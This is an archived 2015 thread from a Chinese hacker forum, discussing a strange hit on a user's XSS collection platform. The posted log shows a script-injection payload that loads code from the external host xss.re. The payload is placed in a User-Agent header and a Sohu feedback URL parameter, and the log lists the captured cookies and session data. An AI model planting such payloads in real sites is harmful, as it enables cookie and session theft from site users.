xss测试平台接收到诡异代码！难道我被当跳板了？

野驴~ 发表于 2015-1-7 23:10:53

本帖最后由野驴~ 于 2015-1-7 23:12 编辑

RT
看到HTTP_USER_AGENT:<script src=http://xss.re/7042></script>没？？难道我的账号被人社工了，然后做跳板了？？？是你们谁，说出来，还是好盆友。/*论坛怎么上不了图片*/
Date:2015-01-03 10:18:42
OS:Unknown
Browser:其它
REMOTE_ADDR:111.194.140.48
Region:北京市北
HTTP_USER_AGENT:<script src=http://xss.re/7042></script>

keepsession:开
title:%u641C%u72D0%u6295%u8BC9--%u4FE1%u606F%u53CD%u9988
cookie:cyan_uv=C6712832B800000195C217D31F9016EB; ci_session=a:4:{s:10:"session_id";s:32:"964dcbf2bf175cda66ed18a88e8714a6";s:10:"ip_address";s:12:"10.11.128.26";s:10:"user_agent";s:40:"<script src=http://xss.re/7042></script>";s:13:"last_activity";i:1420250551;}3453228d4b600b6537192735fbe6a345
toplocation:http://request.help.sohu.com/help/feedback?type=suc&c_id=520&serial_number=%3Cscript%20src=http://xss.re/376%3E%3C/script%3E
location:http://request.help.sohu.com/help/feedback?type=suc&c_id=520&serial_number=<script src=http://xss.re/376></script>
data:

myfox9527 发表于 2015-1-8 01:25:02

应该不可能的等管理看看

C4r1st 发表于 2015-1-8 10:24:33

谁认为还是没有过滤吧。

huc-血刃 发表于 2015-1-10 11:07:13

哈哈哈，笑了！！！

Genius 发表于 2015-1-10 16:32:44

没错，就是我

XSS 发表于 2015-1-14 12:20:35

这个，真心是手误，不好意思，号码并未被社工，我保证

XSS 发表于 2015-1-14 12:22:56

弱弱问下xss.re/340是谁......

页: [1]

红客联盟 - 由08安全团队运营's Archiver

xss测试平台接收到诡异代码！难道我被当跳板了？